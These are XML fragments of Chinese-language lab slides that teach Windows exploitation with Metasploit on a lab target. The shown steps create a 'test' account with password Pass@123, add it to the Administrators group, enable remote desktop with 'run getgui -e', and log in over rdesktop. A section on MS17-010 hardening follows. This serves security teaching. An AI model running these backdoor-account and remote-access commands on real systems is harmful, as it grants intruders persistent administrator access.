            <a:off x="3859413" y="5614515"/>
            <a:ext cx="2462534" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>图3-1-19 查看用户信息</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9218" name="图片 11" descr="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55430" y="1343016"/>
            <a:ext cx="5270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70806" y="2819505"/>
            <a:ext cx="9853353" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>8.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>用命令</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>net user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>查看系统用户信息，当前显示只有系统只有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Administrator</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Guest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>两个用户，如图</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>3-1-19</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>所示</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9219" name="图片 12"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7349" y="3768841"/>
            <a:ext cx="5270500"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0211" y="636906"/>
            <a:ext cx="10515600" cy="4351338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>9.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>用net user test Pass@123 /add命令远程创建一个用户</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>test,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>密码</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Pass@123,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>用net user命令查看系统用户信息，发现多了一个用户test, 如图</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>3-1-20</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>所示,再用net localgroup </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>dministrators test /add命令将用户test加入管理员组，使test用户具有管理员权限，达到提权的目的，用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>n</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>et localgroup </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>dministrators命令查看</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>dministraots管理员组的成员已有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>test</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>用户，攻击者已获取了远程靶机管理员权限。如图3-1-21所示。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10242" name="图片 13" descr="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2668" y="3479483"/>
            <a:ext cx="7306887" cy="226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572231" y="5926598"/>
            <a:ext cx="3185487"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charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>图</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" kern="100" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>3-1-20</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" kern="100" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>新建用户并查看结果</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" kern="100" dirty="0">
              <a:latin typeface="Calibri" panose="020F050202020403020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0211" y="636906"/>
            <a:ext cx="10515600" cy="4351338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>9.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>用net user test Pass@123 /add命令远程创建一个用户</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>test,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>密码</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Pass@123,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>用net user命令查看系统用户信息，发现多了一个用户test, 如图</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>3-1-20</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>所示,再用net localgroup </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>dministrators test /add命令将用户test加入管理员组，使test用户具有管理员权限，达到提权的目的，用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>n</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>et localgroup </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>dministrators命令查看</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>dministraots管理员组的成员已有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>test</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>用户，攻击者已获取了远程靶机管理员权限。如图3-1-21所示。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2400" dirty="0">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10242" name="图片 13" descr="10"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId1">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect r="26786"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="760212" y="2812575"/>
            <a:ext cx="5349644" cy="226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344420" y="5743718"/>
            <a:ext cx="3185487"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charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>图</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" kern="100" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>3-1-20</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" kern="100" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>新建用户并查看结果</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" kern="100" dirty="0">
              <a:latin typeface="Calibri" panose="020F0502020204030204" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11266" name="图片 14"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8913" y="2828868"/>
            <a:ext cx="52705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7097789" y="5619026"/>
            <a:ext cx="3416320"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charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>图</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" kern="100" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>3-1-21</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" kern="100" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>将用户添加入管理员组</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" kern="100" dirty="0">
              <a:latin typeface="Calibri" panose="020F050202020403020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0211" y="636906"/>
            <a:ext cx="10515600" cy="4351338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" b="1" dirty="0"/>
              <a:t>步骤三，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
              <a:t>MS12-020</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" b="1" dirty="0"/>
              <a:t>漏洞利用验证</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>1.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>为验证</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>test</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>用户添加的作用，用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>run </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>getgui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> –e</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>命令在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>开启远程桌面，然后操作攻击机远程桌面靶机服务器，使用新添加的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>test</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>用户登陆，如图</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>3-1-22</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>所示。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="矩形 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2778472" y="5236641"/>
            <a:ext cx="4917885" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>图</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>3-1-22</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>run </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>getgui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> –e</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>命令在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>开启远程桌面</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1229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70653" y="2525105"/>
            <a:ext cx="5486400" cy="22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448" y="703407"/>
            <a:ext cx="10515600" cy="4351338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>2.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>kali</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>新开一个终端，用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>rdesk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> 192.168.66.30</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>连接远程桌面，随后弹出连接界面，用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>test</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>用户和密码</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Pass@123</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>登陆，成功登陆后查看用户属性时，发现用户已是管理员组成员，证明利用成功，如图</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>3-1-23</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>至</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>3-1-25</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>所示</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="矩形 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="713885" y="5560838"/>
            <a:ext cx="2739917" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>图</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>3-1-23 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>rdesk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>远程连接</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13314" name="Picture 2" descr="rdesktop"/>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2016" y="2390514"/>
            <a:ext cx="4463934" cy="291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捕获"/>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9360" y="2470295"/>
            <a:ext cx="414776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6255587" y="5306922"/>
            <a:ext cx="4201535" cy="507831"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" kern="100" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>图</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" kern="100" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>3-1-24 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" kern="100" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" kern="100" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>test</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" kern="100" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>用户和密码</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" kern="100" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Pass@123</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" kern="100" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>登陆</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" kern="100" dirty="0">
              <a:latin typeface="Calibri" panose="020F050202020403020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11164" y="769909"/>
            <a:ext cx="7706908" cy="3876906"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="矩形 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3775997" y="5386270"/>
            <a:ext cx="3231631" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>图</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>3-1-25</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>查看test用户属性</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14339" name="Picture 3" descr="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3782" y="769909"/>
            <a:ext cx="6636532" cy="40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40575" y="640080"/>
            <a:ext cx="10482349" cy="4006735"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" b="1" dirty="0"/>
              <a:t>步骤四，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
              <a:t>MS17-010</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" b="1" dirty="0"/>
              <a:t>漏洞利用加固</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>对于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>MS17_010</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
